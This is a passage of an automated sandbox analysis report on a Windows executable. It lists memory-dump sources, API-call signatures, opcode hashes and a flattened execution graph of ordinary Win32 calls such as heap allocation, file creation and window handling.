                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction ID: 84a502ef329111f45b75735ee98b05bbb8abde518fb530cc481733cdeaf2302d
                                                              • Opcode Fuzzy Hash: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction Fuzzy Hash: 76216532608B8086D725CF56B44079AB7A5F7887D4F088325FF9917BA9DF3DC5529700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                              • String ID:
                                                              • API String ID: 4012708801-0
                                                              • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                                              • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                                              • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapmemsetwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 1807340688-0
                                                              • Opcode ID: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction ID: 2291175711b854bc4f74fb4265d0f1bd771c1a5bff4f4550b8324bf1b1149364
                                                              • Opcode Fuzzy Hash: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction Fuzzy Hash: DA3129B1605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518351
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 3901518246-0
                                                              • Opcode ID: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction ID: 7f7b652e9f7b58be947c1c734e7a82da3d99598ff0fb71c13e03353473737a2d
                                                              • Opcode Fuzzy Hash: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction Fuzzy Hash: 063142B2211B409BE702DF13EA807A937A4F78CBD0F448429EB4847B65DF79E4A6C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                                              • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction ID: 61c3440d716b3c64d08436ee48054615140ae5ecb8d8084460387f48d4e9dd56
                                                              • Opcode Fuzzy Hash: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction Fuzzy Hash: BB11C13260878082EB25CF26B41076AB7A4FB89BE4F140328EF9D57BE5DF39C0118704
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalFreeHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 1298188129-0
                                                              • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                                              • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                              • String ID:
                                                              • API String ID: 4254243056-0
                                                              • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                                              • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

                                                              Execution Graph

                                                              Execution Coverage:14.1%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:814
                                                              Total number of Limit Nodes:20
Sleep PostMessageW 7738->7739 7739->7737 7744 14000e83b HeapAlloc 7745 14000e87d 7744->7745 7746 14000303f 7757 140012600 TlsGetValue 7746->7757 7748 140003044 7749 140012360 HeapFree 7748->7749 7750 140003058 7749->7750 7751 140012360 HeapFree 7750->7751 7752 14000306a 7751->7752 7753 140012360 HeapFree 7752->7753 7754 14000307c 7753->7754 7755 140012360 HeapFree 7754->7755 7756 14000308e 7755->7756 7757->7748 7758 14000c040 7763 140011248 EnterCriticalSection 7758->7763 7761 14000c075 7762 14000c05d CloseHandle 7762->7761 7764 14001127a LeaveCriticalSection 7763->7764 7765 14001126c 7763->7765 7766 14000c058 7764->7766 7765->7764 7766->7761 7766->7762 8102 1400048c0 8111 140012600 TlsGetValue 8102->8111 8104 1400048c5 8105 140012360 HeapFree 8104->8105 8106 1400048d9 8105->8106 8107 140012360 HeapFree 8106->8107 8108 1400048eb 8107->8108 8109 140012360 HeapFree 8108->8109 8110 1400048fd 8109->8110 8111->8104 8250 14000e540 8251 140011248 2 API calls 8250->8251 8252 14000e55f 8251->8252 8253 14000b740 8256 14000b758 8253->8256 8296 14000b5d8 8256->8296 8258 14000b790 8259 14000b5d8 2 API calls 8258->8259 8260 14000b79b 8259->8260 8261 14000b5d8 2 API calls 8260->8261 8262 14000b7a6 8261->8262 8263 14000b7b2 GetStockObject 8262->8263 8264 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 8262->8264 8263->8264 8265 14000be5c 3 API calls 8264->8265 8266 14000b83f 8265->8266 8267 14000bf44 7 API calls 8266->8267 8268 14000b84d 8267->8268 8269 14000b859 IsWindowEnabled 8268->8269 8270 14000b87a 8268->8270 8269->8270 8271 14000b863 EnableWindow 8269->8271 8272 14000be5c 3 API calls 8270->8272 8271->8270 8273 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 8272->8273 8274 14000b902 6 API calls 8273->8274 8275 14000bb96 8273->8275 8276 14000ba12 SendMessageW wcslen wcslen SendMessageW 8274->8276 8277 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 8274->8277 8278 14000bba4 8275->8278 8299 1400127b0 TlsGetValue 
8275->8299 8276->8277 8281 14000bb48 8277->8281 8279 14000bba9 HeapFree 8278->8279 8280 14000bbbb 8278->8280 8279->8280 8283 14000bbd2 8280->8283 8284 14000bbc0 HeapFree 8280->8284 8285 14000bb51 8281->8285 8286 14000bb0a GetMessageW 8281->8286 8288 14000bbd7 HeapFree 8283->8288 8289 14000b751 8283->8289 8284->8283 8290 14000bb56 DestroyAcceleratorTable 8285->8290 8291 14000bb5f 8285->8291 8286->8285 8287 14000bb20 TranslateAcceleratorW 8286->8287 8287->8281 8292 14000bb34 TranslateMessage DispatchMessageW 8287->8292 8288->8289 8290->8291 8291->8275 8293 14000bb68 wcslen 8291->8293 8292->8281 8294 1400126d0 2 API calls 8293->8294 8295 14000bb77 wcscpy HeapFree 8294->8295 8295->8275 8297 14000b5ea wcslen HeapAlloc 8296->8297 8298 14000b60e 8296->8298 8297->8298 8298->8258 8299->8278 7767 14000c444 7768 14000c455 7767->7768 7769 14000c44d SetEnvironmentVariableW 7767->7769 7769->7768 8112 14000cec4 8113 14000cf4b 8112->8113 8114 14000cee9 8112->8114 8114->8113 8116 14000cf02 8114->8116 8120 14000d140 8114->8120 8116->8113 8119 140016538 5 API calls 8116->8119 8127 14000d1f0 8116->8127 8136 14000d02c 8116->8136 8119->8116 8121 14000d15b 8120->8121 8122 14000d1b4 memset 8121->8122 8123 14000d163 HeapFree 8121->8123 8125 1400168c0 HeapFree 8121->8125 8126 1400116f4 3 API calls 8121->8126 8124 14000d1d0 8122->8124 8123->8121 8124->8116 8125->8121 8126->8121 8128 14000d230 8127->8128 8130 14000d210 8127->8130 8129 14001147c 4 API calls 8128->8129 8135 14000d22e 8129->8135 8130->8128 8131 14000d21d 8130->8131 8133 1400168c0 HeapFree 8131->8133 8131->8135 8132 14000d295 8132->8116 8133->8135 8134 14000d281 memset 8134->8132 8135->8132 8135->8134 8137 14000d073 8136->8137 8138 14000d04c 8136->8138 8142 14000d08f 8137->8142 8157 14000d3a4 8137->8157 8151 14000cf74 8138->8151 8141 14000d051 8141->8137 8143 14000d059 8141->8143 8144 14001147c 4 API calls 8142->8144 8145 14000d06e 8143->8145 8149 1400168c0 HeapFree 8143->8149 8146 14000d0a6 8144->8146 8147 14000d11c 8145->8147 
8148 14000d108 memset 8145->8148 8146->8147 8150 14000d0ae wcslen HeapAlloc wcscpy 8146->8150 8147->8116 8148->8147 8149->8145 8150->8145 8152 14000cfa2 8151->8152 8154 14000cfe2 8151->8154 8153 14000d3a4 tolower 8152->8153 8155 14000cfa7 8153->8155 8154->8155 8156 14000cff8 wcscmp 8154->8156 8155->8141 8156->8154 8156->8155 8158 14000d3c7 tolower 8157->8158 8159 14000d3b8 8158->8159 8160 14000d3d0 8158->8160 8159->8158 8160->8142 8300 140003144 8301 140003147 8300->8301 8302 140012360 HeapFree 8301->8302 8303 140003156 8302->8303 8304 140012360 HeapFree 8303->8304 8305 140003168 8304->8305 7770 140002648 7771 14000264f 7770->7771 7772 140012360 HeapFree 7771->7772 7773 140002666 7772->7773 7774 140012360 HeapFree 7773->7774 7775 140002678 7774->7775 7776 140012360 HeapFree 7775->7776 7777 14000268a 7776->7777 7778 140012360 HeapFree 7777->7778 7779 14000269c 7778->7779 7780 140012360 HeapFree 7779->7780 7781 1400026ae 7780->7781 8161 1400088c9 8162 1400088e0 8161->8162 8163 1400088fa 8161->8163 8164 140009da0 _wcsicmp 8162->8164 8166 1400088eb 8162->8166 8165 14000afc0 _wcsicmp 8163->8165 8163->8166 8164->8166 8165->8166 7782 14000b64c 7783 14000b667 7782->7783 7784 14000b70e UnregisterClassW 7782->7784 7785 14000b68b 7783->7785 7787 14000b674 DefWindowProcW 7783->7787 7788 14000b67f 7783->7788 7786 14000b72c 7784->7786 7785->7786 7789 14000b6ea EnableWindow 7785->7789 7790 14000b6fc 7785->7790 7787->7786 7788->7785 7791 14000b695 GetWindowLongPtrW GetWindowTextLengthW HeapAlloc GetWindowTextW 7788->7791 7789->7790 7794 14000bf44 7790->7794 7791->7785 7795 14000bf57 EnumWindows 7794->7795 7796 14000bfbb 7794->7796 7798 14000b703 DestroyWindow 7795->7798 7799 14000bf77 GetCurrentThreadId 7795->7799 7797 14000bfc7 GetCurrentThreadId 7796->7797 7796->7798 7801 14000bfdb EnableWindow 7796->7801 7803 14000bff0 SetWindowPos 7796->7803 7805 140011c68 7796->7805 7797->7796 7798->7786 7800 14000bf85 7799->7800 7800->7798 7800->7799 7802 14000bf8b SetWindowPos 7800->7802 
7801->7796 7802->7800 7803->7796 7806 140011c74 HeapFree 7805->7806 7808 14001f820 7806->7808 8167 1400130cb 8169 1400130d0 8167->8169 8168 140014d80 3 API calls 8172 140013480 8168->8172 8170 1400132ba 8169->8170 8171 1400132aa memmove 8169->8171 8170->8168 8170->8172 8171->8170 8306 140002b4c 8307 1400123e0 21 API calls 8306->8307 8308 140002b6a 8307->8308 8391 140016fd0 8392 140017000 8391->8392 8392->8392 8393 14001700b MultiByteToWideChar malloc MultiByteToWideChar 8392->8393 7510 14000de50 7528 1400112a8 EnterCriticalSection 7510->7528 7512 14000de98 7513 14000deb6 7512->7513 7514 14000defb 7512->7514 7522 14000e04d 7512->7522 7515 14000dec9 7513->7515 7516 14000decd CreateFileW 7513->7516 7517 14000df42 7514->7517 7518 14000df00 7514->7518 7515->7516 7524 14000dfb7 7516->7524 7521 14000df5f CreateFileW 7517->7521 7517->7524 7519 14000df13 7518->7519 7520 14000df17 CreateFileW 7518->7520 7519->7520 7520->7524 7523 14000df8d CreateFileW 7521->7523 7521->7524 7523->7524 7524->7522 7525 14000dfe1 HeapAlloc 7524->7525 7526 14000dff9 7524->7526 7525->7526 7526->7522 7527 14000e036 SetFilePointer 7526->7527 7527->7522 7529 1400112e3 7528->7529 7530 1400112d0 7528->7530 7531 140011312 7529->7531 7532 1400112e9 HeapReAlloc 7529->7532 7533 140011cb0 HeapAlloc 7530->7533 7535 14001132d HeapAlloc 7531->7535 7537 14001131d 7531->7537 7532->7531 7534 1400112de 7533->7534 7536 140011352 LeaveCriticalSection 7534->7536 7535->7537 7536->7512 7537->7536 8173 1400086d0 8174 140008701 8173->8174 8175 1400086ee 8173->8175 8176 140008710 CharLowerW CharLowerW 8174->8176 8177 14000873e 8174->8177 8176->8174 8176->8177 7809 140002853 7830 1400123e0 7809->7830 7813 14000286b 7843 1400121c0 GetLastError TlsGetValue SetLastError 7813->7843 7815 140002889 7844 140012450 7815->7844 7817 140002898 7849 1400121c0 GetLastError TlsGetValue SetLastError 7817->7849 7819 1400028a6 7850 1400121c0 GetLastError TlsGetValue SetLastError 7819->7850 7821 1400028ba 7851 14000c8e0 7821->7851 7825 
1400028d4 7856 1400125d0 TlsGetValue 7825->7856 7827 1400028e5 7857 14000b574 7827->7857 7829 1400028fb 7831 1400123ed 7830->7831 7832 14001240f TlsGetValue 7830->7832 7835 140012060 5 API calls 7831->7835 7833 140002861 7832->7833 7834 140012420 7832->7834 7842 1400121c0 GetLastError TlsGetValue SetLastError 7833->7842 7873 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7834->7873 7836 1400123f2 TlsGetValue 7835->7836 7864 140016cc4 7836->7864 7839 140012425 TlsGetValue 7841 140016cc4 13 API calls 7839->7841 7841->7833 7842->7813 7843->7815 7845 140012477 7844->7845 7846 140012469 wcslen 7844->7846 7847 1400126d0 2 API calls 7845->7847 7846->7845 7848 140012485 7847->7848 7848->7817 7849->7819 7850->7821 7852 14000c8f0 7851->7852 7853 1400126d0 2 API calls 7852->7853 7854 1400028ca 7853->7854 7855 140012520 TlsGetValue 7854->7855 7855->7825 7856->7827 7874 14000be5c GetForegroundWindow 7857->7874 7860 14000bf44 7 API calls 7861 14000b5a3 MessageBoxW 7860->7861 7862 14000bf44 7 API calls 7861->7862 7863 14000b5bf 7862->7863 7863->7829 7865 140016cf2 TlsAlloc InitializeCriticalSection 7864->7865 7866 140016d11 TlsGetValue 7864->7866 7865->7866 7867 140016de6 HeapAlloc 7866->7867 7868 140016d29 HeapAlloc 7866->7868 7869 14001240d 7867->7869 7868->7869 7870 140016d49 EnterCriticalSection 7868->7870 7869->7833 7871 140016d61 7 API calls 7870->7871 7872 140016d5e 7870->7872 7871->7867 7872->7871 7873->7839 7875 14000b596 7874->7875 7876 14000be76 GetWindowThreadProcessId GetCurrentProcessId 7874->7876 7875->7860 7876->7875 8394 1400031d9 8395 1400031dc 8394->8395 8396 140012360 HeapFree 8395->8396 8397 1400031eb 8396->8397 8398 14000c3dc GetEnvironmentVariableW 8399 14000c408 8398->8399 8400 1400126d0 2 API calls 8399->8400 8401 14000c413 GetEnvironmentVariableW 8400->8401 8178 1400076e0 8179 14000773d 8178->8179 8181 1400076f1 8178->8181 8180 140007729 wcsstr 8180->8179 8181->8179 8181->8180 8315 140007760 8316 1400077e7 8315->8316 8317 140007769 8315->8317 8317->8316 8318 
1400077b9 8317->8318 8319 1400077c0 wcsstr 8317->8319 8322 1400085f0 8318->8322 8321 1400077be 8319->8321 8323 14000869f 8322->8323 8324 140008617 CharLowerW 8322->8324 8323->8321 8325 140008630 8324->8325 8325->8323 8325->8325 8326 14000864c CharLowerW 8325->8326 8327 140008670 CharLowerW CharLowerW 8325->8327 8326->8325 8327->8325

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                              • String ID: GetLongPathNameW$Kernel32.DLL
                                                              • API String ID: 820969696-2943376620
                                                              • Opcode ID: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction ID: 08c74a34c6d82e646fe97c561cc400b119dc1938ee8d5d8dcc972cb306c03a44
                                                              • Opcode Fuzzy Hash: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction Fuzzy Hash: 17116D31721B4086EF159F27A9843A967A1FB8CFC0F481029EF4E4B7A5DE39C8528340

                                                              Control-flow Graph

                                                              APIs
                                                              Similarity
                                                              • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 4232179356-0
                                                              • Opcode ID: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction ID: 2ef6d83f5e2b3c8fb19d65fceeff62dc40447b47a2c1a218917e14d6a90cbc88
                                                              • Opcode Fuzzy Hash: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction Fuzzy Hash: E38162FBE69644E5EA07B763BC86BED5220D3AD3D4F504410FF08062A3EE3995E64B10

                                                              Control-flow Graph

                                                              APIs
                                                              Similarity
                                                              • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
                                                              • String ID:
                                                              • API String ID: 2685021396-0
                                                              • Opcode ID: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction ID: 9fd7d13fb8664e67d48ce56ae15862c74b29b4b7423edb5d501112f331116329
                                                              • Opcode Fuzzy Hash: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction Fuzzy Hash: 2B51D4B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

                                                              Control-flow Graph

                                                              APIs
                                                              Similarity
                                                              • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                                              • String ID:
                                                              • API String ID: 2499486723-0
                                                              • Opcode ID: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction ID: 5e2f233be3bb1e1a489454234068146e28d45b36aeb09ace1181e30b51997f55
                                                              • Opcode Fuzzy Hash: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction Fuzzy Hash: 6C722BB6E25548D6EA16B7B7B8877E95220A3AD394F500411FF4C0B363EE39C5F64B10

                                                              Control-flow Graph

                                                              APIs
                                                              Similarity
                                                              • API ID: FilePointermemmove
                                                              • String ID:
                                                              • API String ID: 2366752189-0
                                                              • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                                              • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                                                • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                                                • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                                                • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                                                • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                                                • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                                                • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                                                • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                                                                • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                                                • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                                                • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                                                • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                                                • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                                                • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                                                • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                                                • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
